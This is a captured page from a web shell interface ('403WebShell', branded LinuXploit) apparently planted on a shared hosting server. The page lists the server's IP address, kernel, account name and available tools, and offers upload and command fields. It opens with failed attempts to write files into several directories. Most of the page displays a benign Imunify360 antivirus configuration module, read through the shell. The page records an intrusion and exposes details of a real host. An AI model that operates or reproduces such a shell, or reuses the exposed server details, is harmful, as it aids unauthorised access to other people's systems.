Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.117.101.250
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/imunify360/venv/lib/python3.11/site-packages/imav/subsys/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/imunify360/venv/lib/python3.11/site-packages/imav/subsys/realtime_av.py
"""
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License,
or (at your option) any later version.


This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more details.


You should have received a copy of the GNU General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.

Copyright © 2019 Cloud Linux Software Inc.

This software is also available under ImunifyAV commercial license,
see <https://www.imunify360.com/legal/eula>
"""
import asyncio
import base64
import logging
import os
import re
import shutil
from pathlib import Path
from typing import Callable, Iterable, List, Set, Tuple

from defence360agent.contracts.config import ANTIVIRUS_MODE, Malware
from defence360agent.subsys.panels.hosting_panel import HostingPanel
from defence360agent.utils import check_run
from imav.malwarelib.model import MalwareIgnorePath
from imav.malwarelib.scan.crontab import crontab_path

logger = logging.getLogger(__name__)

# location of admin provided watched and ignored paths
_ADMIN_PATH = Path("/etc/sysconfig/imunify360/malware-filters-admin-conf")
# location of internal configs, shipped with imunify360-firewall
_INTERNAL_PATH = Path("/var/imunify360/files/realtime-av-conf/v1")
# location of processed configs
_PROCESSED_PATH = _ADMIN_PATH / "processed"

_PD_NAME = "pd-combined.txt"
_INTERNAL_NAME = "av-internal.txt"
_ADMIN_NAME = "av-admin.txt"
_ADMIN_PATHS_NAME = "av-admin-paths.txt"
_IGNORED_SUB_DIR = "ignored"
_MAX_PATTERN_LENGTH = 64000

_SERVICE = "imunify-realtime-av"
_PD_PREPARE = "/usr/bin/i360-exclcomp"


class PatternLengthError(Exception):
    """Raised when pattern's length is too big."""

    pass


def _save_basedirs(dir: Path, basedirs: Set[str]) -> None:
    """Save list of basedirs in a file inside dir."""
    with (dir / "basedirs-list.txt").open("w") as f:
        for basedir in sorted(basedirs):
            f.write(os.path.realpath(basedir) + "\n")


def _split_paths(paths: List[str]) -> Tuple[List[str], List[str]]:
    """Split paths into two lists: absolute and relative.

    Relative paths start with +. This + sign is removed from resulting path."""
    absolute, relative = [], []
    for path in paths:
        if path.startswith("+"):
            relative.append(path[1:])
        else:
            absolute.append(path)
    return absolute, relative


def _read_list(path: Path) -> List[str]:
    """Read file at path and return its lines as a list.

    Empty lines or lines starting with '#' symbol are skipped. Lines are
    stripped of leading and trailing whitespace. If the file does not exist,
    empty list is returned."""
    try:
        with path.open() as f:
            lines = [line.strip() for line in f]
            return [x for x in lines if len(x) > 0 and not x.startswith("#")]
    except FileNotFoundError:
        return []


class _Watched(list):
    """Holds a list of watched glob patterns ready to be saved."""

    def __init__(self, w: List[str], basedirs: Set[str]) -> None:
        super().__init__()
        absolute, relative = _split_paths(w)
        self.extend(
            os.path.realpath(p)
            for p in absolute + self._extend_relative(relative, basedirs)
            if self._is_valid(p)
        )

    @staticmethod
    def _is_valid(pattern: str) -> bool:
        """Return True if watched pattern is valid."""
        if not pattern.startswith("/"):
            logger.warning(
                "skipping watched path %s: not starts with /", pattern
            )
            return False
        return True

    @staticmethod
    def _extend_relative(paths: List[str], basedirs: Set[str]) -> List[str]:
        """Join basedirs with all paths and return resulting list."""
        extended = []
        for path in paths:
            for basedir in basedirs:
                extended.append(os.path.join(basedir, path))
        return extended

    def save(self, path: Path) -> None:
        """Save watched list at specified path."""
        with path.open("w") as f:
            f.write("\n".join(self))


class _Ignored(str):
    """Holds a list of ignored regexp patterns ready to be saved."""

    @staticmethod
    def _is_valid_relative(pattern: str) -> bool:
        """Return True if relative ignored pattern is valid."""
        if pattern.startswith("^"):
            logger.warning(
                "skipping relative ignored path %s: starts with ^", pattern
            )
            return False
        return True

    @staticmethod
    def _remove_leading_slash(pattern: str) -> str:
        """Remove leading slash from pattern, if present."""
        if pattern.startswith("/"):
            return pattern[1:]
        return pattern

    @staticmethod
    def _compiles(pattern: str) -> bool:
        """Return True if pattern successfully compiles as regexp."""
        try:
            re.compile(pattern)
            return True
        except Exception:
            logger.warning(
                "skipping ignored pattern %s: invalid regex", pattern
            )
            return False

    @classmethod
    def from_patterns(
        cls, patterns: List[str], basedirs: Set[str]
    ) -> "_Ignored":
        """Build single ignored regexp from given patterns and basedirs."""
        absolute, relative = _split_paths(patterns)
        absolute = [p for p in absolute if cls._compiles(p)]
        relative = [
            cls._remove_leading_slash(p)
            for p in relative
            if cls._is_valid_relative(p) and cls._compiles(p)
        ]
        if len(basedirs) > 0 and len(relative) > 0:
            relative_pattern = "^(?:{})/(?:{})".format(
                "|".join(basedirs), "|".join(relative)
            )
            absolute.append(relative_pattern)
        pat = "|".join(absolute)
        if pat == "":
            pat = "^$"
        return _Ignored(pat)

    def save(self, path: Path):
        """Save ignored list at specified path."""
        if len(self) > _MAX_PATTERN_LENGTH:
            raise PatternLengthError(
                "{} pattern is too long ({})".format(path, len(self))
            )
        with path.open("w") as f:
            f.write(self)


def _read_configs(panel: str, name: str) -> Tuple[List[str], List[str]]:
    """Read internal and admin lists from files with given name."""
    common_dir = _INTERNAL_PATH / "common"
    internal = _read_list(common_dir / name)

    panel_path = _INTERNAL_PATH / panel.lower()
    if panel_path.exists():
        internal.extend(_read_list(panel_path / name))

    return internal, _read_list(_ADMIN_PATH / name)


class _WatchedCtx:
    def __init__(self, internal: _Watched, admin: _Watched) -> None:
        self.internal = internal
        self.admin = admin

    def save(self, dir: Path) -> None:
        w = dir / "watched"
        w.mkdir(exist_ok=True)
        self.internal.save(w / _INTERNAL_NAME)
        self.admin.save(w / _ADMIN_NAME)


def _watched_context(
    panel_name: str, basedirs: Set[str], *, extra: Iterable[str]
) -> _WatchedCtx:
    internal_watched, admin_watched = _read_configs(panel_name, "watched.txt")
    internal_watched.extend(extra)
    return _WatchedCtx(
        _Watched(internal_watched, basedirs), _Watched(admin_watched, basedirs)
    )


class _IgnoredCtx:
    def __init__(
        self, internal: _Ignored, admin: _Ignored, pd: _Ignored
    ) -> None:
        self.internal = internal
        self.admin = admin
        self.pd = pd

    def save(self, dir: Path) -> None:
        w = dir / _IGNORED_SUB_DIR
        w.mkdir(exist_ok=True)
        self.internal.save(w / _INTERNAL_NAME)
        self.admin.save(w / _ADMIN_NAME)
        self.pd.save(w / _PD_NAME)


def _ignored_context(panel_name: str, basedirs: Set[str]) -> _IgnoredCtx:
    internal_ignored, admin_ignored = _read_configs(panel_name, "ignored.txt")

    return _IgnoredCtx(
        _Ignored.from_patterns(internal_ignored, basedirs),
        _Ignored.from_patterns(admin_ignored, basedirs),
        _Ignored.from_patterns(internal_ignored + admin_ignored, basedirs),
    )


def _admin_ignored_paths(dir: Path) -> None:
    ignored_paths = MalwareIgnorePath.path_list()
    ignored_paths_base64 = b"".join(
        base64.b64encode(os.fsencode(path)) + b"\n" for path in ignored_paths
    )
    target = dir / _IGNORED_SUB_DIR / _ADMIN_PATHS_NAME
    target.write_bytes(ignored_paths_base64)


def _contain_changes(dir1: Path, dir2: Path) -> bool:
    """Compare content of two folders if files in this directory are the
    same return False."""
    for file in dir1.iterdir():
        if file.is_dir():
            if _contain_changes(file, dir2 / file.name):
                return True
        if not file.is_file():
            continue
        other = dir2 / file.name
        if not other.exists():
            return True
        if file.read_bytes() != other.read_bytes():
            return True
    return False


def _save_configs(dir: Path, savers: List[Callable[[Path], None]]) -> bool:
    """Save configs in directory dir using saves callable.

    Each function in savers will be called with single dir argument."""
    temp = dir.with_suffix(".tmp")
    if temp.exists():
        shutil.rmtree(str(temp))
    temp.mkdir()

    for save in savers:
        save(temp)

    if dir.exists():
        backup = dir.with_name(".backup")
        if backup.exists():
            shutil.rmtree(str(backup))
        dir.rename(backup)
        try:
            temp.rename(dir)
        except Exception:
            backup.rename(dir)
            raise
        return _contain_changes(dir, backup)
    else:
        temp.rename(dir)
        return True


def _update_pd_symlink() -> None:
    target = _PROCESSED_PATH / _IGNORED_SUB_DIR / _PD_NAME
    source = _ADMIN_PATH / _PD_NAME
    try:
        # source.exists() returns False for broken symlink.
        # so call lstat() and if it throws exception, source does not exist.
        _ = source.lstat()
    except FileNotFoundError:
        source.symlink_to(target)
    else:
        if not (
            source.is_symlink() and os.readlink(str(source)) == str(target)
        ):
            source.unlink()
            source.symlink_to(target)


def generate_configs() -> bool:
    """Generate new malware paths filters config."""
    panel = HostingPanel()
    basedirs = panel.basedirs()

    extra_watched = set()
    if Malware.CRONTABS_SCAN_ENABLED:
        extra_watched.add(str(crontab_path()))

    changed = _save_configs(
        _PROCESSED_PATH,
        [
            lambda dir: _save_basedirs(dir, {*basedirs, *extra_watched}),
            _watched_context(panel.NAME, basedirs, extra=extra_watched).save,
            _ignored_context(panel.NAME, basedirs).save,
            _admin_ignored_paths,
        ],
    )
    _update_pd_symlink()
    return changed


async def reload_services() -> None:  # pragma: no cover
    tasks = [
        check_run(["service", _SERVICE, "restart"]),
        check_run([_PD_PREPARE]),
    ]
    for t in tasks:
        try:
            await t
        except asyncio.CancelledError:
            raise
        except Exception as e:
            logger.warning("realtime_av.reload_services exception: %s", e)


def should_be_running() -> bool:
    return not ANTIVIRUS_MODE and Malware.INOTIFY_ENABLED

Youez - 2016 - github.com/yon3zu
LinuXploit